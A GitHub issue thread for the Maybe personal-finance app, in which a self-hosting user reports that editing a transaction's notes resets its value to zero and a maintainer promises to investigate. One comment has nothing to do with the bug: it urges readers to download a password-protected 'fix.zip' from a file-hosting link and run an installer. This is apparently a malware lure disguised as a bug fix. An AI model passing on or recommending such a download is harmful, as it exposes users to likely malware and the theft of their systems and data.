### ISSUE TITLE
Bug: Transactions update to zero

### ISSUE THREAD

**Issue by jvazao** [maybe-finance/maybe#1132]
**Describe the bug**
When editing a transaction, it will update the value to zero.
Specially if there is text in the Notes section.

**To Reproduce**
1. Go to click any transaction
2. Type something into Notes
3. It closes the side bar abruptly and set the transaction value to zero

**Screenshots / Recordings**
[screen capture.webm](https://github.com/user-attachments/assets/92359a6d-b213-48c7-9774-e291b7b0fb0a)

**Additional context**
I'm self hosting and I've been using Maybe for a while, and this behaviour was introduced in version 13.
I'm not sure if i'm the only one with this bug, or more people have it.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zachgoll** [comment]
@jvazao thanks for the report!  Will take a look.

**Comment by jvazao** [comment]
@zachgoll thank you for tanking a look at it and fix it.

**Comment by zachgoll** [comment]
@jvazao absolutely!
